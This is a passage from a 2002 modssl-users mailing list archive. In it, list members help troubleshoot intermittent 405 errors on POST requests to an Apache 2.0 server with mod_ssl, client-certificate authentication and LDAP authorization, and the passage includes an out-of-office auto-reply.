X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I've got an upload_max_filesize = 2M and a memory_limit = 8M and I'm POSTing
10 fields of about 20 characters each! I'm using POST because there will
later be a file attached, but at the moment there isn't. So it can't really
be that, can it ?
	-JP


On Tue, 17 Dec 2002, John.Airey@rnib.org.uk wrote:

> Oops. I meant to say that you should have "memory_limit" twice
> "upload_max_filesize". I've had problem when they've both been the same.
>
> John
>
> > -----Original Message-----
> > From: Jan-Piet Mens [mailto:jpm@Retail-sc.com]
> > Sent: 17 December 2002 16:50
> > To: modssl-users@modssl.org
> > Subject: RE: POST with mod_ssl intermittently fails with a 405
> >
> >
> > I've upgraded to 0.9.6h and recompiled Apache. No change.
> > Still get the
> > hint in the error_log. Any other ideas ?
> >
> > 	-JP
> >
> >
> > On Tue, 17 Dec 2002, Boyle Owen wrote:
> >
> > > Your openSSL libs are a bit old - there have been many
> > important code
> > > updates since 0.9.6b. In particular, the most recent update (0.9.6h)
> > > fixed race condition bugs that were causing intermittent
> > failures. Try
> > > an upgrade first, I would advise...
> > >
> > > Rgds,
> > >
> > > Owen Boyle
> > >
> > > >-----Original Message-----
> > > >From: Jan-Piet Mens [mailto:jpm@Retail-sc.com]
> > > >Sent: Dienstag, 17. Dezember 2002 16:07
> > > >To: modssl-users@modssl.org
> > > >Subject: POST with mod_ssl intermittently fails with a 405
> > > >
> > > >
> > > >Hello,
> > > >
> > > >I've got an self-built Apache on a RedHat 7.3 Linux box with
> > > >Apache/2.0.43,
> > > >mod_ssl/2.0.43,  OpenSSL/0.9.6b,  PHP/4.2.3 and mod_authzldap 0.22
> > > >
> > > >Every so often a PHP page is called with a POST request to
> > > >send data to the
> > > >server. The whole server area is protected via the following
> > > >settings in
> > > >ssl.conf:
> > > >
> > > >
> > > >        Options Indexes FollowSymLinks ExecCGI
> > > >        DirectoryIndex index.php index.cgi
> > > >        SSLOptions FakeBasicAuth ExportCertData CompatEnvVars
> > > >StrictRequire StdEnvVars OptRenegotiate
> > > >
> > > >        SSLRequireSSL
> > > >        SSLVerifyClient require
> > > >        SSLVerifyDepth  4
> > > >        SSLRequire     ( \
> > > >                %{SSL_CIPHER} !~ m/^(EXP|NULL)/ and \
> > > >                %{SSL_CLIENT_I_DN_CN} eq "my CA" )
> > > >
> > > >        AuthzLDAPEngine                 on
> > > >        AuthzLDAPAuthoritative          on
> > > >        AuthzLDAPServer                 localhost:389
> > > >        AuthzLDAPBindDN
> > "cn=manager,dc=mydomain,dc=com"
> > > >        AuthzLDAPBindPassword           "terriblysecret"
> > > >        AuthzLDAPUseCertificate         on
> > > >        AuthzLDAPSetAuthorization       on
> > > >        AuthzLDAPUseSerial              on
> > > >        AuthzLDAPMapBase
> > > >ou=AuthzLDAPCertmap,dc=mydomain,dc=com
> > > >        AuthzLDAPMapScope               subtree
> > > >        AuthzLDAPLogLevel               warn
> > > >        AuthzLDAPCacheConnection        off
> > > >        AuthzLDAPCacheSize              0
> > > >        AuthName                        AuthzLDAP
> > > >        AuthType                        Basic
> > > >
> > > >
> > > >and with the following require in .htaccess of the same directory:
> > > >
> > > >	require user "CN=Jan-Piet Mens/Email=jpm@mydomain.com"
> > > >
> > > >GET operations always work perfectly (BTW almost all resources
> > > >are .PHP).
> > > >Once in a while a POST method is attempted which then
> > > >sometimes fails (not
> > > >always). When it has failed, subsequent GET methods on
> > > >different pages do
> > > >not work either. After a certain time which always differs,
> > > >the GET will work
> > > >and the following POST also.
> > > >
> > > >I've tried changing SSLSessionCache to `shm' and SSLMutex to
> > > >`sem' thinking
> > > >it had something to do with it, but to no avail. The value of
> > > >SSLSessionCacheTimeout
> > > >doesn't seem to matter either.
> > > >
> > > >At the time of the failure, the logs have this in them:
> > > >
> > > >error_log:
> > > >	[Tue Dec 17 15:38:21 2002] [notice] Apache/2.0.43
> > > >(Unix) mod_ssl/2.0.43 OpenSSL/0.9.6b PHP/4.2.3 configured --
> > > >resuming normal operations
> > > >	[Tue Dec 17 15:48:08 2002] [error] SSL Re-negotiation
> > > >in conjunction with POST method not supported!
> > > >	hint: try SSLOptions +OptRenegotiate
> > > >
> > > >access_log:
> > > >	10.0.0.1 - - [17/Dec/2002:15:48:08 +0100] "POST
> > > >/ca/ra/upd.php HTTP/1.1" 405 312
> > > >	10.0.0.1 - - [17/Dec/2002:15:48:28 +0100] "GET
> > > >/ca/ra/req.php HTTP/1.1" 403 292
> > > >	10.0.0.1 - CN=Jan-Piet Mens/Email=jpm@mydomain.com
> > > >[17/Dec/2002:15:49:21 +0100] "GET /ca/ra/req.php HTTP/1.1" 200 4936
> > > >
> > > >ssl_request_log:
> > > >	[17/Dec/2002:15:48:08 +0100] 10.0.0.1 TLSv1 RC4-MD5
> > > >"POST /ca/ra/upd.php HTTP/1.1" 312 s_dn="-",  issuer="-"
> > > >
> > > >The clients are a mixture of Mozilla 1.2 and Internet
> > Explorer 6.0 all
> > > >with a client cert issued by my CA. The issue affects both
> > > >clients (Netscape
> > > >4.5 shows the same)
> > > >
> > > >Can someone help me resolve this, please ?
> > > >
> > > >Thank you very much.
> > > >Regards,
> > > >	-JP
> > > >
> > >
> > >_____________________________________________________________
> > _________
> > > >Apache Interface to OpenSSL (mod_ssl)
> > www.modssl.org
> > > >User Support Mailing List
> > modssl-users@modssl.org
> > > >Automated List Manager
> > majordomo@modssl.org
> > > >
> > >
> > > This message is for the named person's use only. It may contain
> > > confidential, proprietary or legally privileged information. No
> > > confidentiality or privilege is waived or lost by any
> > mistransmission.
> > > If you receive this message in error, please notify the
> > sender urgently
> > > and then immediately delete the message and any copies of
> > it from your
> > > system. Please also immediately destroy any hardcopies of
> > the message.
> > > You must not, directly or indirectly, use, disclose,
> > distribute, print,
> > > or copy any part of this message if you are not the
> > intended recipient.
> > > The sender's company reserves the right to monitor all e-mail
> > > communications through their networks. Any views expressed in this
> > > message are those of the individual sender, except where the message
> > > states otherwise and the sender is authorised to state them
> > to be the
> > > views of the sender's company.
> > >
> > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)
> > www.modssl.org
> > > User Support Mailing List
> > modssl-users@modssl.org
> > > Automated List Manager
> > majordomo@modssl.org
> > >
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
> -
>
> NOTICE: The information contained in this email and any attachments is
> confidential and may be legally privileged. If you are not the
> intended recipient you are hereby notified that you must not use,
> disclose, distribute, copy, print or rely on this email's content. If
> you are not the intended recipient, please notify the sender
> immediately and then delete the email and any attachments from your
> system.
>
> RNIB has made strenuous efforts to ensure that emails and any
> attachments generated by its staff are free from viruses. However, it
> cannot accept any responsibility for any viruses which are
> transmitted. We therefore recommend you scan all attachments.
>
> Please note that the statements and views expressed in this email
> and any attachments are those of the author and do not necessarily
> represent those of RNIB.
>
> RNIB Registered Charity Number: 226227
>
> Website: http://www.rnib.org.uk
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec 18 08:11:58 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C6BB52AA085; Wed, 18 Dec 2002 08:11:58 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from hackberry.abnamro.com (hackberry.abnamro.com [65.173.230.20])
	by master.modssl.org (Postfix) with ESMTP id B7F352AA081
	for ; Wed, 18 Dec 2002 08:11:52 +0100 (CET)
Received: from boxwood.lasalle.na.abnamro.com (boxwood [10.216.0.25])
	by hackberry.abnamro.com (ESMTP) with ESMTP id gBI7BmJ11543
	for ; Wed, 18 Dec 2002 01:11:48 -0600 (CST)
Received: from aachir001.lasalle.na.abnamro.com (aachir001.lasalle.na.abnamro.com [10.211.10.118])
	by boxwood.lasalle.na.abnamro.com (ESMTP) with ESMTP id gBI7Bku21285
	for ; Wed, 18 Dec 2002 01:11:47 -0600 (CST)
Subject: Ilya Birman/US/ABNAMRO/NL is out of the office.
From: ilya.birman@abnamro.com
To: modssl-users@modssl.org
Message-ID: 
Date: Wed, 18 Dec 2002 01:11:28 -0600
X-MIMETrack: Serialize by Router on AACHIR001/HUB/ABNAMRO/NL(Release 5.0.11  |July 24, 2002) at
 12/18/2002 01:12:55 AM
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ilya.birman@abnamro.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I will be out of the office starting  12/17/2002 and will not return until
01/08/2003.

I am out of the office on vacation from Dec 17, 2002, returning
January 8, 2003.
In case of emergency please contact UNIX shift pager at
1562636@worldcom.com
Ilya.

---------------------------------------------------------------------------
This message (including any attachments) is confidential and may be
privileged. If you have received it by mistake please notify the sender by
return e-mail and delete this message from your system. Any unauthorised
use or dissemination of this message in whole or in part is strictly
prohibited. Please note that e-mails are susceptible to change.
ABN AMRO Bank N.V. (including its group companies) shall not be liable for
the improper or incomplete transmission of the information contained in
this communication nor for any delay in its receipt or damage to your
system. ABN AMRO Bank N.V. (or its group companies) does not guarantee that
the integrity of this communication has been maintained nor that this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec 18 10:21:58 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 035F32AA085; Wed, 18 Dec 2002 10:21:57 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id 900682AA081
	for ; Wed, 18 Dec 2002 10:21:56 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id gBI9N3d08257
	for ; Wed, 18 Dec 2002 09:23:23 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Wed, 18 Dec 2002 09:21:20 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F24D0@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: POST with mod_ssl intermittently fails with a 405
Date: Wed, 18 Dec 2002 09:21:20 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Will the file be fairly large then?

Try setting these to 8M and 16M respectively (if you have enough memory that
is), do a reload of the config and see if the problem repeats. It may be the
case that there is a large overhead on the forms that you are submitting
(since each field becomes a PHP variable).

John

> -----Original Message-----
> From: Jan-Piet Mens [mailto:jpm@Retail-sc.com]
> Sent: 17 December 2002 17:39
> To: modssl-users@modssl.org
> Subject: RE: POST with mod_ssl intermittently fails with a 405
> 
> 
> I've got an upload_max_filesize = 2M and a memory_limit = 8M 
> and I'm POSTing
> 10 fields of about 20 characters each! I'm using POST because 
> there will
> later be a file attached, but at the moment there isn't. So 
> it can't really
> be that, can it ?
> 	-JP
> 
> 
> On Tue, 17 Dec 2002, John.Airey@rnib.org.uk wrote:
> 
> > Oops. I meant to say that you should have "memory_limit" twice
> > "upload_max_filesize". I've had problem when they've both 
> been the same.
> >
> > John
> >
> > > -----Original Message-----
> > > From: Jan-Piet Mens [mailto:jpm@Retail-sc.com]
> > > Sent: 17 December 2002 16:50
> > > To: modssl-users@modssl.org
> > > Subject: RE: POST with mod_ssl intermittently fails with a 405
> > >
> > >
> > > I've upgraded to 0.9.6h and recompiled Apache. No change.
> > > Still get the
> > > hint in the error_log. Any other ideas ?
> > >
> > > 	-JP
> > >
> > >
> > > On Tue, 17 Dec 2002, Boyle Owen wrote:
> > >
> > > > Your openSSL libs are a bit old - there have been many
> > > important code
> > > > updates since 0.9.6b. In particular, the most recent 
> update (0.9.6h)
> > > > fixed race condition bugs that were causing intermittent
> > > failures. Try
> > > > an upgrade first, I would advise...
> > > >
> > > > Rgds,
> > > >
> > > > Owen Boyle
> > > >
> > > > >-----Original Message-----
> > > > >From: Jan-Piet Mens [mailto:jpm@Retail-sc.com]
> > > > >Sent: Dienstag, 17. Dezember 2002 16:07
> > > > >To: modssl-users@modssl.org
> > > > >Subject: POST with mod_ssl intermittently fails with a 405
> > > > >
> > > > >
> > > > >Hello,
> > > > >
> > > > >I've got an self-built Apache on a RedHat 7.3 Linux box with
> > > > >Apache/2.0.43,
> > > > >mod_ssl/2.0.43,  OpenSSL/0.9.6b,  PHP/4.2.3 and 
> mod_authzldap 0.22
> > > > >
> > > > >Every so often a PHP page is called with a POST request to
> > > > >send data to the
> > > > >server. The whole server area is protected via the following
> > > > >settings in
> > > > >ssl.conf:
> > > > >
> > > > >
> > > > >        Options Indexes FollowSymLinks ExecCGI
> > > > >        DirectoryIndex index.php index.cgi
> > > > >        SSLOptions FakeBasicAuth ExportCertData CompatEnvVars
> > > > >StrictRequire StdEnvVars OptRenegotiate
> > > > >
> > > > >        SSLRequireSSL
> > > > >        SSLVerifyClient require
> > > > >        SSLVerifyDepth  4
> > > > >        SSLRequire     ( \
> > > > >                %{SSL_CIPHER} !~ m/^(EXP|NULL)/ and \
> > > > >                %{SSL_CLIENT_I_DN_CN} eq "my CA" )
> > > > >
> > > > >        AuthzLDAPEngine                 on
> > > > >        AuthzLDAPAuthoritative          on
> > > > >        AuthzLDAPServer                 localhost:389
> > > > >        AuthzLDAPBindDN
> > > "cn=manager,dc=mydomain,dc=com"
> > > > >        AuthzLDAPBindPassword           "terriblysecret"
> > > > >        AuthzLDAPUseCertificate         on
> > > > >        AuthzLDAPSetAuthorization       on
> > > > >        AuthzLDAPUseSerial              on
> > > > >        AuthzLDAPMapBase
> > > > >ou=AuthzLDAPCertmap,dc=mydomain,dc=com
> > > > >        AuthzLDAPMapScope               subtree
> > > > >        AuthzLDAPLogLevel               warn
> > > > >        AuthzLDAPCacheConnection        off
> > > > >        AuthzLDAPCacheSize              0
> > > > >        AuthName                        AuthzLDAP
> > > > >        AuthType                        Basic
> > > > >
> > > > >
> > > > >and with the following require in .htaccess of the 
> same directory:
> > > > >
> > > > >	require user "CN=Jan-Piet Mens/Email=jpm@mydomain.com"
> > > > >
> > > > >GET operations always work perfectly (BTW almost all resources
> > > > >are .PHP).
> > > > >Once in a while a POST method is attempted which then
> > > > >sometimes fails (not
> > > > >always). When it has failed, subsequent GET methods on
> > > > >different pages do
> > > > >not work either. After a certain time which always differs,
> > > > >the GET will work
> > > > >and the following POST also.
> > > > >
> > > > >I've tried changing SSLSessionCache to `shm' and SSLMutex to
> > > > >`sem' thinking
> > > > >it had something to do with it, but to no avail. The value of
> > > > >SSLSessionCacheTimeout
> > > > >doesn't seem to matter either.
> > > > >
> > > > >At the time of the failure, the logs have this in them:
> > > > >
> > > > >error_log:
> > > > >	[Tue Dec 17 15:38:21 2002] [notice] Apache/2.0.43
> > > > >(Unix) mod_ssl/2.0.43 OpenSSL/0.9.6b PHP/4.2.3 configured --
> > > > >resuming normal operations
> > > > >	[Tue Dec 17 15:48:08 2002] [error] SSL Re-negotiation
> > > > >in conjunction with POST method not supported!
> > > > >	hint: try SSLOptions +OptRenegotiate
> > > > >
> > > > >access_log:
> > > > >	10.0.0.1 - - [17/Dec/2002:15:48:08 +0100] "POST
> > > > >/ca/ra/upd.php HTTP/1.1" 405 312
> > > > >	10.0.0.1 - - [17/Dec/2002:15:48:28 +0100] "GET
> > > > >/ca/ra/req.php HTTP/1.1" 403 292
> > > > >	10.0.0.1 - CN=Jan-Piet Mens/Email=jpm@mydomain.com
> > > > >[17/Dec/2002:15:49:21 +0100] "GET /ca/ra/req.php 
> HTTP/1.1" 200 4936
> > > > >
> > > > >ssl_request_log:
> > > > >	[17/Dec/2002:15:48:08 +0100] 10.0.0.1 TLSv1 RC4-MD5
> > > > >"POST /ca/ra/upd.php HTTP/1.1" 312 s_dn="-",  issuer="-"
> > > > >
> > > > >The clients are a mixture of Mozilla 1.2 and Internet
> > > Explorer 6.0 all
> > > > >with a client cert issued by my CA. The issue affects both
> > > > >clients (Netscape
> > > > >4.5 shows the same)
> > > > >
> > > > >Can someone help me resolve this, please ?
> > > > >
> > > > >Thank you very much.
> > > > >Regards,
> > > > >	-JP
> > > > >
> > > >
> > > >_____________________________________________________________
> > > _________
> > > > >Apache Interface to OpenSSL (mod_ssl)
> > > www.modssl.org
> > > > >User Support Mailing List
> > > modssl-users@modssl.org
> > > > >Automated List Manager
> > > majordomo@modssl.org
> > > > >
> > > >
> > > > This message is for the named person's use only. It may contain
> > > > confidential, proprietary or legally privileged information. No
> > > > confidentiality or privilege is waived or lost by any
> > > mistransmission.
> > > > If you receive this message in error, please notify the
> > > sender urgently
> > > > and then immediately delete the message and any copies of
> > > it from your
> > > > system. Please also immediately destroy any hardcopies of
> > > the message.
> > > > You must not, directly or indirectly, use, disclose,
> > > distribute, print,
> > > > or copy any part of this message if you are not the
> > > intended recipient.
> > > > The sender's company reserves the right to monitor all e-mail
> > > > communications through their networks. Any views 
> expressed in this
> > > > message are those of the individual sender, except 
> where the message
> > > > states otherwise and the sender is authorised to state them
> > > to be the
> > > > views of the sender's company.
> > > >
> > > 
> ______________________________________________________________________
> > > > Apache Interface to OpenSSL (mod_ssl)
> > > www.modssl.org
> > > > User Support Mailing List
> > > modssl-users@modssl.org
> > > > Automated List Manager
> > > majordomo@modssl.org
> > > >
> > >
> > > 
> ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   
> www.modssl.org
> > > User Support Mailing List                      
> modssl-users@modssl.org
> > > Automated List Manager                            
> majordomo@modssl.org
> > >
> >
> > -
> >
> > NOTICE: The information contained in this email and any 
> attachments is
> > confidential and may be legally privileged. If you are not the
> > intended recipient you are hereby notified that you must not use,
> > disclose, distribute, copy, print or rely on this email's 
> content. If
> > you are not the intended recipient, please notify the sender
> > immediately and then delete the email and any attachments from your
> > system.
> >
> > RNIB has made strenuous efforts to ensure that emails and any
> > attachments generated by its staff are free from viruses. 
> However, it
> > cannot accept any responsibility for any viruses which are
> > transmitted. We therefore recommend you scan all attachments.
> >
> > Please note that the statements and views expressed in this email
> > and any attachments are those of the author and do not necessarily
> > represent those of RNIB.
> >
> > RNIB Registered Charity Number: 226227
> >
> > Website: http://www.rnib.org.uk
> > 
> ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   
> www.modssl.org
> > User Support Mailing List                      
> modssl-users@modssl.org
> > Automated List Manager                            
> majordomo@modssl.org
> >
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec 18 13:27:14 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 68F952AA085; Wed, 18 Dec 2002 13:27:14 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from GATE2.retail-sc.com (ns.rscweb.net [195.127.175.210])
	by master.modssl.org (Postfix) with ESMTP id CD5EC2AA081
	for ; Wed, 18 Dec 2002 13:27:12 +0100 (CET)
Received: from mambox.intdus.retail-sc.com (IDENT:root@mambox.intdus.retail-sc.com [10.0.12.1])
	by GATE2.retail-sc.com (8.9.3/8.9.3) with ESMTP id NAA30243
	for ; Wed, 18 Dec 2002 13:25:03 +0100
Received: from mambox.intdus.retail-sc.com (IDENT:jpm@mambox.intdus.retail-sc.com [10.0.12.1])
	by mambox.intdus.retail-sc.com (8.9.1/8.9.1) with ESMTP id NAA18705
	for ; Wed, 18 Dec 2002 13:25:02 +0100
Date: Wed, 18 Dec 2002 13:25:02 +0100 (CET)
From: Jan-Piet Mens 
To: modssl-users@modssl.org
Subject: RE: POST with mod_ssl intermittently fails with a 405
In-Reply-To: <9B66BBD37D5DD411B8CE00508B69700F033F24D0@pborolocal.rnib.org.uk>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-G2-MailScanner: Found to be clean
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jan-Piet Mens 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

No change. Initially all works fine. If I set SSLSessionCacheTimeout to 15
the 405 followed by 403 errors occur immediately! Otherwise when set to 3600
the errors occur at different intervals. What now ?

Thanks & regards,
	-JP


On Wed, 18 Dec 2002, John.Airey@rnib.org.uk wrote:

> Will the file be fairly large then?
>
> Try setting these to 8M and 16M respectively (if you have enough memory that
> is), do a reload of the config and see if the problem repeats. It may be the
> case that there is a large overhead on the forms that you are submitting
> (since each field becomes a PHP variable).
>
> John
>
> > -----Original Message-----
> > From: Jan-Piet Mens [mailto:jpm@Retail-sc.com]
> > Sent: 17 December 2002 17:39
> > To: modssl-users@modssl.org
> > Subject: RE: POST with mod_ssl intermittently fails with a 405
> >
> >
> > I've got an upload_max_filesize = 2M and a memory_limit = 8M
> > and I'm POSTing
> > 10 fields of about 20 characters each! I'm using POST because
> > there will
> > later be a file attached, but at the moment there isn't. So
> > it can't really
> > be that, can it ?
> > 	-JP
> >
> >
> > On Tue, 17 Dec 2002, John.Airey@rnib.org.uk wrote:
> >
> > > Oops. I meant to say that you should have "memory_limit" twice
> > > "upload_max_filesize". I've had problem when they've both
> > been the same.
> > >
> > > John
> > >
> > > > -----Original Message-----
> > > > From: Jan-Piet Mens [mailto:jpm@Retail-sc.com]
> > > > Sent: 17 December 2002 16:50
> > > > To: modssl-users@modssl.org
> > > > Subject: RE: POST with mod_ssl intermittently fails with a 405
> > > >
> > > >
> > > > I've upgraded to 0.9.6h and recompiled Apache. No change.
> > > > Still get the
> > > > hint in the error_log. Any other ideas ?
> > > >
> > > > 	-JP
> > > >
> > > >
> > > > On Tue, 17 Dec 2002, Boyle Owen wrote:
> > > >
> > > > > Your openSSL libs are a bit old - there have been many
> > > > important code
> > > > > updates since 0.9.6b. In particular, the most recent
> > update (0.9.6h)
> > > > > fixed race condition bugs that were causing intermittent
> > > > failures. Try
> > > > > an upgrade first, I would advise...
> > > > >
> > > > > Rgds,
> > > > >
> > > > > Owen Boyle
> > > > >
> > > > > >-----Original Message-----
> > > > > >From: Jan-Piet Mens [mailto:jpm@Retail-sc.com]
> > > > > >Sent: Dienstag, 17. Dezember 2002 16:07
> > > > > >To: modssl-users@modssl.org
> > > > > >Subject: POST with mod_ssl intermittently fails with a 405
> > > > > >
> > > > > >
> > > > > >Hello,
> > > > > >
> > > > > >I've got an self-built Apache on a RedHat 7.3 Linux box with
> > > > > >Apache/2.0.43,
> > > > > >mod_ssl/2.0.43,  OpenSSL/0.9.6b,  PHP/4.2.3 and
> > mod_authzldap 0.22
> > > > > >
> > > > > >Every so often a PHP page is called with a POST request to
> > > > > >send data to the
> > > > > >server. The whole server area is protected via the following
> > > > > >settings in
> > > > > >ssl.conf:
> > > > > >
> > > > > >
> > > > > >        Options Indexes FollowSymLinks ExecCGI
> > > > > >        DirectoryIndex index.php index.cgi
> > > > > >        SSLOptions FakeBasicAuth ExportCertData CompatEnvVars
> > > > > >StrictRequire StdEnvVars OptRenegotiate
> > > > > >
> > > > > >        SSLRequireSSL
> > > > > >        SSLVerifyClient require
> > > > > >        SSLVerifyDepth  4
> > > > > >        SSLRequire     ( \
> > > > > >                %{SSL_CIPHER} !~ m/^(EXP|NULL)/ and \
> > > > > >                %{SSL_CLIENT_I_DN_CN} eq "my CA" )
> > > > > >
> > > > > >        AuthzLDAPEngine                 on
> > > > > >        AuthzLDAPAuthoritative          on
> > > > > >        AuthzLDAPServer                 localhost:389
> > > > > >        AuthzLDAPBindDN
> > > > "cn=manager,dc=mydomain,dc=com"
> > > > > >        AuthzLDAPBindPassword           "terriblysecret"
> > > > > >        AuthzLDAPUseCertificate         on
> > > > > >        AuthzLDAPSetAuthorization       on
> > > > > >        AuthzLDAPUseSerial              on
> > > > > >        AuthzLDAPMapBase
> > > > > >ou=AuthzLDAPCertmap,dc=mydomain,dc=com
> > > > > >        AuthzLDAPMapScope               subtree
> > > > > >        AuthzLDAPLogLevel               warn
> > > > > >        AuthzLDAPCacheConnection        off
> > > > > >        AuthzLDAPCacheSize              0
> > > > > >        AuthName                        AuthzLDAP
> > > > > >        AuthType                        Basic
> > > > > >
> > > > > >
> > > > > >and with the following require in .htaccess of the
> > same directory:
> > > > > >
> > > > > >	require user "CN=Jan-Piet Mens/Email=jpm@mydomain.com"
> > > > > >
> > > > > >GET operations always work perfectly (BTW almost all resources
> > > > > >are .PHP).
> > > > > >Once in a while a POST method is attempted which then
> > > > > >sometimes fails (not
> > > > > >always). When it has failed, subsequent GET methods on
> > > > > >different pages do
> > > > > >not work either. After a certain time which always differs,
> > > > > >the GET will work
> > > > > >and the following POST also.
> > > > > >
> > > > > >I've tried changing SSLSessionCache to `shm' and SSLMutex to
> > > > > >`sem' thinking
> > > > > >it had something to do with it, but to no avail. The value of
> > > > > >SSLSessionCacheTimeout
> > > > > >doesn't seem to matter either.
> > > > > >
> > > > > >At the time of the failure, the logs have this in them:
> > > > > >
> > > > > >error_log:
> > > > > >	[Tue Dec 17 15:38:21 2002] [notice] Apache/2.0.43
> > > > > >(Unix) mod_ssl/2.0.43 OpenSSL/0.9.6b PHP/4.2.3 configured --
> > > > > >resuming normal operations
> > > > > >	[Tue Dec 17 15:48:08 2002] [error] SSL Re-negotiation
> > > > > >in conjunction with POST method not supported!
> > > > > >	hint: try SSLOptions +OptRenegotiate
> > > > > >
> > > > > >access_log:
> > > > > >	10.0.0.1 - - [17/Dec/2002:15:48:08 +0100] "POST
> > > > > >/ca/ra/upd.php HTTP/1.1" 405 312
> > > > > >	10.0.0.1 - - [17/Dec/2002:15:48:28 +0100] "GET
> > > > > >/ca/ra/req.php HTTP/1.1" 403 292
> > > > > >	10.0.0.1 - CN=Jan-Piet Mens/Email=jpm@mydomain.com
> > > > > >[17/Dec/2002:15:49:21 +0100] "GET /ca/ra/req.php
> > HTTP/1.1" 200 4936
> > > > > >
> > > > > >ssl_request_log:
> > > > > >	[17/Dec/2002:15:48:08 +0100] 10.0.0.1 TLSv1 RC4-MD5
> > > > > >"POST /ca/ra/upd.php HTTP/1.1" 312 s_dn="-",  issuer="-"
> > > > > >
> > > > > >The clients are a mixture of Mozilla 1.2 and Internet
> > > > Explorer 6.0 all
> > > > > >with a client cert issued by my CA. The issue affects both
> > > > > >clients (Netscape
> > > > > >4.5 shows the same)
> > > > > >
> > > > > >Can someone help me resolve this, please ?
> > > > > >
> > > > > >Thank you very much.
> > > > > >Regards,
> > > > > >	-JP
> > > > > >
> > > > >
> > > > >_____________________________________________________________
> > > > _________
> > > > > >Apache Interface to OpenSSL (mod_ssl)
> > > > www.modssl.org
> > > > > >User Support Mailing List
> > > > modssl-users@modssl.org
> > > > > >Automated List Manager
> > > > majordomo@modssl.org
> > > > > >
> > > > >
> > > > > This message is for the named person's use only. It may contain
> > > > > confidential, proprietary or legally privileged information. No
> > > > > confidentiality or privilege is waived or lost by any
> > > > mistransmission.
> > > > > If you receive this message in error, please notify the
> > > > sender urgently
> > > > > and then immediately delete the message and any copies of
> > > > it from your
> > > > > system. Please also immediately destroy any hardcopies of
> > > > the message.
> > > > > You must not, directly or indirectly, use, disclose,
> > > > distribute, print,
> > > > > or copy any part of this message if you are not the
> > > > intended recipient.
> > > > > The sender's company reserves the right to monitor all e-mail
> > > > > communications through their networks. Any views
> > expressed in this
> > > > > message are those of the individual sender, except
> > where the message
> > > > > states otherwise and the sender is authorised to state them
> > > > to be the
> > > > > views of the sender's company.
> > > > >
> > > >
> > ______________________________________________________________________
> > > > > Apache Interface to OpenSSL (mod_ssl)
> > > > www.modssl.org
> > > > > User Support Mailing List
> > > > modssl-users@modssl.org
> > > > > Automated List Manager
> > > > majordomo@modssl.org
> > > > >
> > > >
> > > >
> > ______________________________________________________________________
> > > > Apache Interface to OpenSSL (mod_ssl)
> > www.modssl.org
> > > > User Support Mailing List
> > modssl-users@modssl.org
> > > > Automated List Manager
> > majordomo@modssl.org
> > > >
> > >
> > > -
> > >
> > > NOTICE: The information contained in this email and any
